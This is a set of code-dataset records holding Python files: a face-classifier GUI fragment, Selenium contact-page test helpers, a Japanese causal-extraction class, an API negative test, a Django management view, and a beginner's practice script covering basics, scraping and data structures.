result = self.predict_image(roi)\r\n text = \"{:.2f}%\".format(confidence * 100)\r\n text2 = \"{}\".format(result)\r\n\r\n\r\n cv2.rectangle(mainImage, (cvRect[0], cvRect[1]), (cvRect[2], cvRect[3]),\r\n (0, 255, 255), 2)\r\n\r\n cv2.putText(mainImage, text, (startX, y),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\r\n\r\n cv2.putText(mainImage, text2, (startX, y - 20),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n\r\n if count>0:\r\n text1 = \"Predicted: {}\".format(result)\r\n self.lbl_result.setText(text1)\r\n # self.displayImage(mainImage)\r\n image = self.image_resize(mainImage, height=600)\r\n cv2.namedWindow('Hipster or Not Detection')\r\n cv2.imshow('Hipster or Not Detection',image)\r\n\r\n else:\r\n self.lbl_result.setText(\"Please Use a Full Front Face\")\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n app=QApplication(sys.argv)\r\n window=hipsterOrNot()\r\n window.setWindowTitle('Hipster or Not Detection')\r\n window.show()\r\n sys.exit(app.exec_())","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":9498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417699857","text":"\nfrom model.contact import Contact\nimport re\n\nclass ContactHelper:\n\n def __init__(self,app):\n self.app = app\n\n def open_contact_page(self):\n wd = self.app.wd\n if not wd.current_url.endswith(\"/index.php\"):\n wd.find_element_by_link_text(\"home\").click()\n\n def return_home_page_contact(self):\n wd = self.app.wd\n wd.find_element_by_link_text(\"home\").click()\n\n def create(self, contact):\n wd = self.app.wd\n self.add_new_contact()\n # fill group form\n self.addinfo(contact)\n # submit contact creation\n wd.find_element_by_name(\"submit\").click()\n self.return_home_page_contact()\n self.contact_cache = None\n\n def add_new_contact(self):\n wd = self.app.wd\n # add new contact\n wd.find_element_by_link_text(\"add new\").click()\n self.contact_cache = None\n\n def delete_contact_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n # select first contact\n self.select_contact_by_index(index)\n # submit deletion\n wd.find_element_by_xpath(\"//input[@value='Delete']\").click()\n # ok dialog window\n wd.switch_to_alert().accept()\n # wait info\n wd.find_element_by_css_selector(\"div.msgbox\")\n self.return_home_page_contact()\n self.contact_cache = None\n\n def delete_contact_by_id(self, id):\n wd = self.app.wd\n self.open_contact_page()\n # select first contact\n self.select_contact_by_id(id)\n # submit deletion\n wd.find_element_by_xpath(\"//input[@value='Delete']\").click()\n # ok dialog window\n wd.switch_to_alert().accept()\n # wait info\n wd.find_element_by_css_selector(\"div.msgbox\")\n self.return_home_page_contact()\n self.contact_cache = None\n\n def delete_first_contact(self):\n self.delete_contact_by_index(0)\n\n def select_contact_by_index(self, index):\n wd = self.app.wd\n wd.find_elements_by_name(\"selected[]\")[index].click()\n\n def select_contact_by_id(self, id):\n wd = self.app.wd\n wd.find_element_by_css_selector(\"input[value='%s']\" % id).click()\n\n def modify_contact_by_index(self, index, contact):\n wd = self.app.wd\n self.open_contact_page()\n #self.select_contact_by_index(index)\n # Edit\n wd.find_element_by_xpath(\"(//img[@alt='Edit'])[\" + str(index) +\"]\").click()\n # modify\n self.addinfo(contact)\n # click update\n wd.find_element_by_name(\"update\").click()\n self.return_home_page_contact()\n self.contact_cache = None\n\n def modify_first_contact(self):\n self.modify_contact_by_index(0)\n\n def modify(self, contact):\n wd = self.app.wd\n self.open_contact_page()\n self.select_first_contact()\n # Edit\n wd.find_element_by_css_selector('img[alt=\"Edit\"]').click()\n # modify\n self.addinfo(contact)\n # click update\n wd.find_element_by_name(\"update\").click()\n self.return_home_page_contact()\n self.contact_cache = None\n\n def select_first_contact(self):\n wd = self.app.wd\n wd.find_element_by_name(\"selected[]\").click()\n\n\n def addinfo(self, contact):\n wd = self.app.wd\n self.change_field_value(\"firstname\", contact.firstname)\n self.change_field_value(\"middlename\", contact.middlename)\n self.change_field_value(\"lastname\", contact.lastname)\n self.change_field_value(\"nickname\", contact.nickname)\n self.contact_cache = None\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n self.contact_cache = None\n\n def count(self):\n wd = self.app.wd\n self.open_contact_page()\n return len(wd.find_elements_by_name(\"selected[]\"))\n\n contact_cache = None\n\n def get_contact_list(self):\n if self.contact_cache is None:\n wd = self.app.wd\n self.open_contact_page()\n self.contact_cache = []\n #contact_table = wd.find_element_by_css_selector(\"tbody\")\n for row in wd.find_elements_by_name(\"entry\"):\n cells = row.find_elements_by_tag_name(\"td\")\n firstname = cells[2].text\n lastname = cells[1].text\n address = cells[3].text\n id = cells[0].find_element_by_name(\"selected[]\").get_attribute(\"value\")\n all_phones = cells[5].text\n all_emails_from_home_page = cells[4].text\n self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id,\n all_phones_from_home_page=all_phones, address=address,\n all_emails_from_home_page=all_emails_from_home_page))\n return list(self.contact_cache)\n\n\n def open_contact_to_edit_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n row = wd.find_elements_by_name(\"entry\")[index]\n cell = row.find_elements_by_tag_name(\"td\")[7]\n cell.find_element_by_tag_name(\"a\").click()\n\n def open_contact_view_by_index(self, index):\n wd = self.app.wd\n self.open_contact_page()\n row = wd.find_elements_by_name(\"entry\")[index]\n cell = row.find_elements_by_tag_name(\"td\")[6]\n cell.find_element_by_tag_name(\"a\").click()\n\n\n def get_contact_info_from_edit_page(self, index):\n wd = self.app.wd\n self.open_contact_to_edit_by_index(index)\n firstname = wd.find_element_by_name(\"firstname\").get_attribute(\"value\")\n lastname = wd.find_element_by_name(\"lastname\").get_attribute(\"value\")\n id = wd.find_element_by_name(\"id\").get_attribute(\"value\")\n homephone = wd.find_element_by_name(\"home\").get_attribute(\"value\")\n workphone = wd.find_element_by_name(\"work\").get_attribute(\"value\")\n mobilphone = wd.find_element_by_name(\"mobile\").get_attribute(\"value\")\n secondaryphone = wd.find_element_by_name(\"phone2\").get_attribute(\"value\")\n address = wd.find_element_by_name(\"address\").get_attribute(\"value\")\n email = wd.find_element_by_name(\"email\").get_attribute(\"value\")\n email2 = wd.find_element_by_name(\"email2\").get_attribute(\"value\")\n email3 = wd.find_element_by_name(\"email3\").get_attribute(\"value\")\n return Contact(firstname=firstname, lastname=lastname, id=id,\n homephone=homephone, mobilphone=mobilphone,\n workphone=workphone, secondaryphone=secondaryphone,\n address=address, email=email, email2=email2, email3=email3)\n\n def get_contact_from_view_page(self, index):\n wd = self.app.wd\n self.open_contact_view_by_index(index)\n text = wd.find_element_by_id(\"content\").text\n homephone = re.search(\"H: (.*)\", text).group(1)\n workphone = re.search(\"W: (.*)\", text).group(1)\n mobilphone = re.search(\"M: (.*)\", text).group(1)\n secondaryphone = re.search(\"P: (.*)\", text).group(1)\n return Contact(homephone=homephone, mobilphone=mobilphone,\n workphone=workphone, secondaryphone=secondaryphone)\n","sub_path":"fixture/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31697456","text":"import re\nfrom .models import Causal, Goal, Step, PrunedUser, Smart, Relation, Pattern, Crawler, ResultExpression, ClueExpression\nfrom cabocha.analyzer import CaboChaAnalyzer\nfrom cabocha.analyzer import EndOfLinkException\nfrom enum import Enum\nfrom datetime import datetime\nimport pandas as pd\n\n\nclass cross_bootstrap:\n clueList = []\n\n eclueList = []\n\n gclueList = []\n\n geclueList = []\n\n eqclueList = []\n\n eqeclueList = []\n\n rclueList = []\n\n grclueList = []\n\n eqrclueList = []\n\n reclueList = []\n\n greclueList = []\n\n eqreclueList = []\n\n skipList = []\n\n def __init__(self):\n self.utilSet()\n\n def utilSet(self):\n\n self.skipList = pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n\n self.clueList = pd.read_csv(\"Util/ja_clue_list.csv\").dropna(subset=['clue'])\n self.eclueList = pd.read_csv(\"Util/ja_eclue_list.csv\").dropna(subset=['clue'])\n self.gclueList = pd.read_csv(\"Util/ja_goal_clue_list.csv\").dropna(subset=['clue'])\n self.geclueList = pd.read_csv(\"Util/ja_goal_eclue_list.csv\").dropna(subset=['clue'])\n self.eqclueList = pd.read_csv(\"Util/ja_equal_clue_list.csv\").dropna(subset=['clue'])\n self.eqeclueList = pd.read_csv(\"Util/ja_equal_eclue_list.csv\").dropna(subset=['clue'])\n\n self.rclueList = []\n self.grclueList = []\n self.eqrclueList = []\n\n # self.rclueList = pd.read_csv(\"Util/ja_result_list.csv\").dropna(subset=['clue'])['clue']\n # self.grclueList =pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n # self.eqrclueList = pd.read_csv(\"Util/ja_skip_list.csv\").dropna(subset=['clue'])['clue']\n\n def checkResult(self, resultChunk):\n pos = resultChunk[resultChunk.token_size - 1].pos\n pos1 = resultChunk[resultChunk.token_size - 1].pos1\n if pos == \"助詞\":\n return False\n else:\n return True\n\n def getEndResult(self, texts):\n analyzer = CaboChaAnalyzer()\n results = []\n for text in texts:\n tree = analyzer.parse(text)\n lastChunk = tree[tree.chunk_size - 1]\n if self.checkResult(lastChunk):\n results.append(lastChunk)\n return results\n\n def getResultFromCausal(self, causal):\n results = []\n if causal.pattern == Pattern.A or Pattern.B:\n results = self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.C:\n results = self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.D:\n results = self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.E:\n results = self.getEndResult(causal.sentence.split(\"。\"))\n return results\n\n def getClueFromSentence(self, sentence):\n analyzer = CaboChaAnalyzer()\n tree = analyzer.parse(sentence)\n for result in self.rclueList:\n if sentence.endswith(result):\n pass # TODO: E pattern\n elif str(result) in sentence:\n matcher = sentence.split(result)[1]\n return analyzer.parse(matcher)[0]\n else:\n return None\n\n def getResultExpression(self, causals):\n results = []\n results.extend([self.getResultFromCausal(causal) for causal in causals])\n return results\n\n def getClueExpression(self, sentences):\n clues = []\n clues.extend([self.getClueFromSentence(sentence) for sentence in sentences])\n return clues","sub_path":"causal/cross_bootstrap.py","file_name":"cross_bootstrap.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516327269","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom hamcrest import assert_that, equal_to_ignoring_whitespace, is_\n\nfrom hermes.tags import TagsApi\n\n\nclass TestNegativeTag(object):\n\n @pytest.mark.parametrize('tag_id', [None, 0, 100500])\n def test_delete_tag(self, logged_client, config, tag_id):\n code, result = TagsApi.delete_tag(tag_id)\n assert_that(code, is_(404),\n 'Expected that code is \"%s\", but was \"%s\".' % (404, code))\n msg = 'There was an error with your request'\n assert_that(result['message'], equal_to_ignoring_whitespace(msg),\n 'Expected that message is \"%s\", but was \"%s\".' % (\n msg, result['message']\n ))\n","sub_path":"hermes_api_tests/tests/tags/test_negative_tag_functionality.py","file_name":"test_negative_tag_functionality.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621677860","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/resource/views_manage.py\n\n.. enthaelt den View fuer die Management-Ansicht\n Django content Management System\n\nWerner Fabian\nw.fabian@afl.hessen.de\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 30.01.2008 Beginn der Arbeit\n\"\"\"\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\nfrom dms.roles import require_permission\nfrom dms.roles import UserEditPerms\n#from dms.folder.views_manage import do_manage\nfrom dms.resource.utils import get_dont\n\nfrom dms_ext.extension import * # dms-Funktionen ueberschreiben\n\n# -----------------------------------------------------\ndef get_resource_actions(request, user_perms, item_container, app_name,\n has_user_folder, dont={}):\n \"\"\" von get_folderish_actions \"\"\"\n from django.template.loader import get_template\n from django.template import Context\n from dms.queries import get_base_site_url\n import string\n if not request.user.is_authenticated():\n return ''\n t = get_template('app/resource/manage_options_resource.html')\n nPos = max ( string.rfind ( request.path, '/add/' ),\n string.rfind ( request.path, '/edit/' ),\n string.rfind ( request.path, '/navigation/' ),\n string.rfind ( request.path, '/navigation_left/' ),\n string.rfind ( request.path, '/navigation_top/' ),\n string.rfind ( request.path, '/manage/' ),\n string.rfind ( request.path, '/manage_browseable/' ),\n string.rfind ( request.path, '/manage_comments/' ),\n string.rfind ( request.path, '/import/' ),\n string.rfind ( request.path, '/export/' ),\n string.rfind ( request.path, '/manage_site/' ),\n string.rfind ( request.path, '/manage_user/' ),\n string.rfind ( request.path, '/sort/' ),\n string.rfind ( request.path, '/empty_folders/' ),\n string.rfind ( request.path, '/find_items/' ),\n )\n if nPos > -1 or dont != {}:\n path = request.path[:nPos]\n show_mode = not dont.has_key('show_mode') and user_perms.perm_read\n add_mode = not dont.has_key('add_mode') and \\\n user_perms.perm_add and item_container.item.has_user_support\n edit_mode = not dont.has_key('edit_mode') and \\\n user_perms.perm_edit\n # --- Stimmen diese Rechte bei ..own..??\n manage_mode = not dont.has_key('manage_mode') and \\\n ( user_perms.perm_manage or user_perms.perm_edit_own \\\n or user_perms.perm_manage_own )\n import_mode = not dont.has_key('import_mode') and \\\n user_perms.perm_manage_folderish\n export_mode = not dont.has_key('export_mode') and \\\n user_perms.perm_manage_folderish\n browseable_mode = not dont.has_key('browseable_mode') and \\\n user_perms.perm_edit\n comment_mode = not dont.has_key('comment_mode') and \\\n item_container.item.has_comments and \\\n user_perms.perm_edit\n user_mode = not dont.has_key('user_mode') and \\\n user_perms.perm_manage_user and has_user_folder\n navigation_mode = not dont.has_key('navigation_mode') and \\\n user_perms.perm_manage_folderish\n navigation_top_mode = not dont.has_key('navigation_top_mode') and \\\n user_perms.perm_manage_site and item_container.container.id == 1\n navigation_left_mode = not dont.has_key('navigation_left_mode') and \\\n user_perms.perm_manage_site and \\\n ( item_container.container.id == 1 or item_container.item.app.name == 'dmsEduWebquestItem' \\\n or item_container.item.app.name == 'dmsProjectgroup')\n sort_mode = not dont.has_key('sort_mode') and \\\n user_perms.perm_manage\n empty_mode = not dont.has_key('empty_mode') and \\\n user_perms.perm_manage\n search_mode = not dont.has_key('search_mode') and \\\n user_perms.perm_add\n else :\n path = request.path\n show_mode = False\n add_mode = False\n edit_mode = False\n manage_mode = True\n import_mode = False\n export_mode = False\n browseable_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_top_mode = False\n navigation_left_mode = False\n sort_mode = False\n empty_mode = False\n search_mode = False\n\n if string.find ( path, 'index.html' ) < 0 :\n path += 'index.html'\n if ( string.find(request.path, '/add/') >= 0 ):\n edit_mode = False\n import_mode = False\n export_mode = False\n browseable_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_left_mode = False\n sort_mode = False\n empty_mode = False\n search_mode = False\n elif ( string.find(request.path, '/edit/') >= 0 ) :\n edit_mode = False\n user_mode = False\n elif ( string.find(request.path, '/manage/') >= 0 ) :\n manage_mode = False\n elif ( string.find(request.path, '/manage_browseable/') >= 0 ) :\n browseable_mode = False\n elif ( string.find(request.path, '/manage_comment/') >= 0 ) :\n import_mode = False\n export_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_left_mode = False\n sort_mode = False\n elif ( string.find(request.path, '/sort/') >= 0 ) :\n user_mode = False\n sort_mode = False\n elif ( string.find(request.path, '/empty_folders/') >= 0 ):\n empty_mode = False\n elif ( string.find(request.path, '/navigation/') >= 0 ) :\n user_mode = False\n navigation_mode = False\n elif ( string.find(request.path, '/navigation_top/') >= 0 ) :\n user_mode = False\n navigation_top_mode = False\n elif ( string.find(request.path, '/navigation_left/') >= 0 ) :\n user_mode = False\n navigation_left_mode = False\n add_mode = False\n browseable_mode = False\n sort_mode = False\n search_mode = False\n empty_mode = False\n import_mode = False\n export_mode = False\n c = Context( {'authenticated' : request.user.is_authenticated(),\n 'app_name' : app_name,\n 'show_mode' : show_mode,\n 'add_mode' : add_mode,\n 'edit_mode' : edit_mode,\n 'manage_mode' : manage_mode,\n 'import_mode' : import_mode,\n 'export_mode' : import_mode,\n 'browseable_mode' : browseable_mode,\n 'comment_mode' : comment_mode,\n 'navigation_mode' : navigation_mode,\n 'navigation_top_mode' : navigation_top_mode,\n 'navigation_left_mode': navigation_left_mode,\n 'sort_mode' : sort_mode,\n 'empty_mode' : empty_mode,\n 'search_mode' : search_mode,\n 'user_mode' : has_user_folder and user_mode,\n 'path' : get_site_url(item_container, 'index.html'),\n 'user_path' : get_site_url(item_container,\n 'acl_users/index.html'),\n 'user_perms' : user_perms,\n 'user_name' : request.user,\n 'base_site_url' : get_base_site_url(),\n } )\n return t.render(c).strip()\n\n# -----------------------------------------------------\n#@require_permission('perm_add')\ndef do_manage(request, item_container, user_perms, add_ons, app_name,\n my_title, my_title_own, dont={}, allow_copy=True):\n \"\"\" Pflegemodus der Ressourcenverwaltung \"\"\"\n from dms.utils_form import get_base_vars\n from dms.utils import get_site_actions\n from django.shortcuts import render_to_response\n has_user_folder = False\n vars, user_perms = get_base_vars(request, item_container, 'frame-main-manage', False,\n ignore_own_breadcrumb=True)\n for k in dont.items():\n vars[k] = ''\n v = { 'allow_copy' : allow_copy,\n 'title' : my_title,\n 'this_title' : item_container.item.title,\n #'action' : get_folderish_actions(request, user_perms, item_container,\n # app_name, has_user_folder, dont),\n 'action' : get_resource_actions(request, user_perms, item_container,\n app_name, has_user_folder, dont),\n 'action_site' : get_site_actions(request, user_perms, item_container),\n 'add_mode' : user_perms.perm_add,\n 'add_ons_0' : add_ons[0],\n 'add_ons_1' : add_ons[1],\n 'add_ons_2' : add_ons[2],\n 'add_ons_3' : add_ons[3],\n 'ajax_url' : get_site_url(item_container, 'index.html/ajax/'),\n 'no_top_main_navigation': True\n }\n vars.update(v)\n return render_to_response ( 'app/base_manage.html', vars )\n\n\n# -----------------------------------------------------\n@require_permission('perm_add')\ndef resource_manage(request, item_container):\n \"\"\" Pflegemodus der Ressourcenverwaltung \"\"\"\n\n user_perms = UserEditPerms(request.user.username, request.path)\n add_ons = {}\n #add_ons[0] = [ { 'url' : get_site_url(item_container, 'index.html/add/faqitem/'),\n # 'info': _(u'Beitrag zur FAQ-Liste')}, ]\n #add_ons[1] = [ { 'url' : get_site_url(item_container, 'index.html/add/faqboard/'),\n # 'info': _(u'FAQ-Liste')}, ]\n #add_ons[2] = [ { 'url' : get_site_url(item_container, 'index.html/add/userfolder/'),\n # 'info': _(u'Community-Mitglieder eintragen, löschen, Rechte ändern ...')}, ]\n add_ons[0] = [{},]\n add_ons[1] = [{},]\n add_ons[2] = [{},]\n add_ons[3] = [{},]\n\n app_name = 'resource'\n my_title = _(u'Ressourcenverwaltung pflegen')\n my_title_own = ''\n\n return do_manage(request, item_container, user_perms, add_ons, app_name, my_title, \n my_title_own, get_dont())\n","sub_path":"resource/views_manage.py","file_name":"views_manage.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459631140","text":"jerseyNumber = [1,3,6,7,11,9]\n\nprint('Here are the numbers that are still available:')\n\nfor i in range(0,21):\n if i in jerseyNumber:\n continue\n else:\n print(i)\n\n########################################################################################\ndef Bitcoin_to_usd(btc):\n amount = btc * 527\n print(amount)\n\nBitcoin_to_usd(15.0)\nBitcoin_to_usd(13.0)\nBitcoin_to_usd(14.0)\n\n########################################################################################\ndef allowed_dating_age(my_age):\n girls_age = my_age/2 + 7\n return girls_age\n\nli_bo_wang_limit_age = allowed_dating_age(22)\nfather_limit_age = allowed_dating_age(50)\n\nprint('li bo wang can date girls', li_bo_wang_limit_age, 'years old')\nprint('father can date girls', father_limit_age, 'years old')\n\n########################################################################################\ndef sex_gender(sex='Unknow'):\n if sex is 'm':\n sex = 'Male'\n elif sex is 'f':\n sex = 'Famale'\n print(sex)\n\nsex_gender('f')\nsex_gender('m')\nsex_gender()\n\ndef dumb_sentence(name='LI', action='is', item='awasome'):\n print(name, action, item)\n\ndumb_sentence()\ndumb_sentence('BO', 'd')\ndumb_sentence('B', 'T', 'W')\ndumb_sentence(name='NI')\n\n########################################################################################\ndef add_number(*args):\n sum = 0\n for i in args:\n sum += i\n print(sum)\n\nadd_number(2)\nadd_number(1, 2, 5, 5, 8)\nadd_number(12, 55, 7777, 7777777, 329324)\n\n########################################################################################\ndef health_caculator(age, apples_ate, cigs_smoked):\n answer = (100 - age) + (apples_ate * 3.5) - (cigs_smoked * 2)\n print(answer)\n\nli_data = [21, 0, 0]\nhealth_caculator(li_data[0], li_data[1], li_data[2])\n\nbo_data = [21, 1, 1]\nhealth_caculator(* bo_data) # '*' = unpacked list bo_data\n\ngroceries = {'cereal', 'milk', 'starcrunch', 'beer', 'duct tape', 'lotion', 'beer'}\nprint(groceries)\n\nif 'milk' in groceries:\n print('You already have milk hoss')\nelse:\n print('You don\\'t have milk')\n\n\nclassmates = {'yi':'1', 'er':'2', 'san':'3'}\nprint(classmates['er'])\nfor k,v in classmates.items():\n print(k + ' ' + v)\n\n########################################################################################\nimport random\nimport urllib.request\n\ndef download_web_image(url):\n full_name = str(random.randrange(0, 1000)) + '.jpg'\n urllib.request.urlretrieve(url, full_name)\n\ndownload_web_image('https://i0.hdslb.com/bfs/archive/b70f6101851d1edd949164f6c1450a0d5d30fc00.jpg')\n\n\nli = open('iam.txt', 'w')\nli.write('cheer up!\\n')\nli.write('Thanks.\\n')\nli.close()\n\nbo = open('iam.txt', 'r')\ntext = bo.read()\nprint(text)\nbo.close()\n\n########################################################################################\nfrom urllib import request\n\ngoogle_url = 'http://pdf.dfcfw.com/pdf/H2_AN201806261159378699_1.pdf' #url\ndef download_stock_data(csv_url):\n response = request.urlopen(csv_url) #open url\n csv = response.read() #read items\n csv_str = str(csv) #str\n #new file and put items into new file and close file\n lines = csv_str.split('\\\\n')\n dest_url = r'google.csv'\n fx = open(dest_url, 'w')\n for line in lines:\n fx.write(line + '\\n')\n fx.close()\n\ndownload_stock_data(google_url)\n\n########################################################################################\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef trade_spider(max_pages):\n page = 2\n while page < max_pages:\n url = 'http://6666av.vip/list/1-' + str(page) + '.html'\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, 'lxml')\n for link in soup.findAll('a', {'target' : '_blank'}):\n href = 'http://6666av.vip' + link.get('href')\n print(href)\n page += 1\n\n\ntrade_spider(3)\n\n########################################################################################\nwhile True:\n try:\n number = int(input('number:\\n'))\n print(18/number)\n break\n except ValueError:\n print('ValueError.')\n except SyntaxError:\n print('SyntaxError.')\n except ZeroDivisionError:\n print('ZeroDibisionError.')\n finally:\n print('Over.')\n\n########################################################################################\nclass Enemy:\n life = 3\n\n def attack(self):\n print('ouch!')\n self.life -= 1\n\n def check_life(self):\n if self.life <= 0:\n print('You are died!')\n else:\n print('player ' + str(self.life) + 'life left.')\n\n\nenemy1 = Enemy()\nenemy2 = Enemy()\n\nenemy1.attack()\nenemy1.attack()\nenemy1.check_life()\nenemy2.check_life()\n\n########################################################################################\nclass Enemy:\n def __init__(self, x):\n self.energy = x\n\n def get_energy(self):\n print(self.energy)\n\n\njason = Enemy(13)\njason.get_energy()\n\n########################################################################################\nclass Parent():\n\n def print_first_name(self):\n print('Roberts')\n\nclass Child(Parent):\n\n def print_last_name(self):\n print('SHIFT')\n pass\n\nbucky = Child()\nbucky.print_first_name()\nbucky.print_last_name()\n\n########################################################################################\nimport threading\n\nclass BuckysMessenger(threading.Thread):\n def run(self):\n for _ in range(100): #不需要数字,只需要随便循环十次\n print(threading.currentThread().getName())\n\n\nx = BuckysMessenger(name = 'send out messenger')\ny = BuckysMessenger(name = 'receive messenger')\nx.start()\ny.start()\n\n########################################################################################\nimport requests\nfrom bs4 import BeautifulSoup\nimport operator\n\n\ndef start(url):\n word_list = []\n source_code = requests.get(url).text\n soup = BeautifulSoup(source_code, 'lxml')\n for post_text in soup.findAll('p', {'class':'t'}):\n content = post_text.string\n words = content.lower().split()\n for each_word in words:\n word_list.append(each_word)\n clean_up_list(word_list)\n\ndef clean_up_list(word_list):\n clean_word_list = []\n for word in word_list:\n symbols = '~!@#$%^&*():\"<>?/}{][=-'\n for i in range(0, len(symbols)):\n word = word.replace(symbols[i], '')\n if len(word) > 0:\n clean_word_list.append(word)\n create_dictionary(clean_word_list)\n\ndef create_dictionary(clean_word_list):\n word_count = {}\n for word in clean_word_list:\n if word in word_count:\n word_count[word] += 1\n else:\n word_count[word] = 1\n for key, value in sorted(word_count.items(), key = operator.itemgetter(1)): #0:sort by key , 1:sort by value\n print(key, value)\n\n\nstart('https://www.bilibili.com/')\n\n########################################################################################\ndef drop_first_last(grades):\n first, *middle, last = grades\n avg = sum(middle) / len(middle)\n print(avg)\n\ndrop_first_last([12,43,56,78,999999])\n\n########################################################################################\nfirst = ['LI', 'LU']\nlast = ['BO', 'HAI']\n\nnames = zip(first, last)\n\nfor a, b in names:\n print(a, b)\n\n########################################################################################\nanswer = lambda x: x*7\nprint(answer(5))\n\n########################################################################################\nstocks = {\n 'GOOG':520.24,\n 'FB':76.45,\n 'YOOH':39.28,\n 'AMZN':306.21,\n 'AAPL':99.76\n}\n\nprint(min(zip(stocks.values(), stocks.keys())))\nprint(sorted(zip(stocks.values(), stocks.keys())))\n\n########################################################################################\nfrom struct import *\n\n#Store as bytes data\npacked_data = pack('iif', 6, 19, 4.73) #int int float\nprint(packed_data)\n\nprint(calcsize('i'))\nprint(calcsize('f'))\nprint(calcsize('iif'))\n\n#To get bytes data back to normal\noriginal_data = unpack('iif', packed_data)\nprint(original_data)\n\n########################################################################################\nincome = [10, 30, 75]\n\ndef double_money(dollars):\n return dollars*2\n\nnew_income = list(map(double_money, income)) #function, list map:take a loop == for item in income:\nprint(new_income)\n\n\n\n########################################################################################\n#-------------------- Binary AND ----------------------#\na = 50 #110010\nb = 25 #011001\nc = a & b #010000 c == 16\nprint(c)\n\n#-------------------- Binary RIGHT SHIFT ----------------------#\n\nx = 240 #11110000\ny = x >> 2 #00111100 y == 60\nprint(y)\n\n########################################################################################\nimport heapq\n\ngrades = [32, 43, 56, 765, 32, 89, 225]\nprint(heapq.nlargest(3, grades))\n\nstocks = [\n {'thicker':'GOOG', 'price':30.24},\n {'thicker':'FB', 'price':76.45},\n {'thicker':'YOOH', 'price':39.28},\n {'thicker':'AMZN', 'price':306.21},\n {'thicker':'AAPL', 'price':99.76},\n]\n\nprint(heapq.nsmallest(2, stocks, key = lambda stock: stock['price']))\n\n########################################################################################\nfrom collections import Counter\n\ntext = 'Could someone clarify why \"we\"'\\\n 'which also occurred thrice was '\\\n 'not printed along with \"in\", was '\\\n 'it also sorted based on alphabetical preference?'\\\n 'Sorry if this was silly am just a beginner.'\nwords = text.split()\n\ncounter = Counter(words)\ntop_three = counter.most_common(3)\nprint(top_three)\n\n########################################################################################\nfrom operator import itemgetter\n\nstocks = [\n {'thicker':'GOOG', 'price':30.24},\n {'thicker':'FB', 'price':76.45},\n {'thicker':'YOOH', 'price':39.28},\n {'thicker':'AMZN', 'price':306.21},\n {'thicker':'AAPL', 'price':99.76},\n]\n\nfor x in sorted(stocks, key = itemgetter('thicker', 'price')):\n print(x)\n\n########################################################################################\nfrom operator import attrgetter\n\nclass User:\n\n def __init__(self, x, y):\n self.name = x\n self.user_id = y\n\n def __repr__(self):\n return self.name + ':' + str(self.user_id)\n\n\nusers = [\n User('Bucky', 43),\n User('Sally', 5),\n User('Tuna', 61),\n User('Brian', 2),\n User('Joby', 77),\n User('Amanda', 9),\n\n]\n\nfor user in users:\n print(user)\n\nprint('------')\nfor user in sorted(users, key = attrgetter('name')):\n print(user)\n\nprint('------')\nfor user in sorted(users, key=attrgetter('user_id')):\n print(user)\n\n\n########################################################################################\nimport re\n\nm = re.findall('abc', 'aaaaabcaabcc')\nprint(m)\n\nm = re.findall('\\d', 'snkand21d12f2f')\nprint(m)\n\nm = re.findall('\\d\\d\\d\\d', '1234dowjdo4213iojofijo23lj')\nprint(m)\n\n# .:匹配任意字符; *:匹配无限个\n\nm = re.findall(r'(.*)', 'hello')\nprint(m)\n\nm = re.findall(r'(.*)', 'helloworld')\nprint(m)\n\n# ?:非贪婪模式\n\nm = re.findall(r'(.*?)', 'helloworld')\nprint(m)\n\n\n########################################################################################\nclass Stack(object):\n def __init__(self):\n self.data_stack = []\n\n def init_stack(self):\n self.data_stack = []\n\n def insert(self, data):\n self.data_stack.append(data)\n\n def pop(self):\n if len(self.data_stack) == 0:\n return None\n data = self.data_stack[-1]\n del self.data_stack[-1]\n return data\n\n def size(self):\n return len(self.data_stack)\n\n\nstack = Stack()\nstack.insert(1)\nstack.insert(2)\nstack.insert(3)\nprint(stack.size())\nprint(stack.pop())\nprint(stack.pop())\nprint(stack.pop())\nprint(stack.pop())\n\n\n########################################################################################\ndef find_list(list1, goal):\n left = 0\n right = len(list1) - 1\n while left <= right:\n mid = int((left + right)/2)\n if list1[mid] < goal:\n left = mid + 1\n continue\n if list1[mid] == goal:\n return mid\n if list1[mid] > goal:\n right = mid - 1\n continue\n return None\n\nsearch_list = [1, 3, 4, 6, 8, 9]\nprint(find_list(search_list, 1))\nprint(find_list(search_list, 3))\nprint(find_list(search_list, 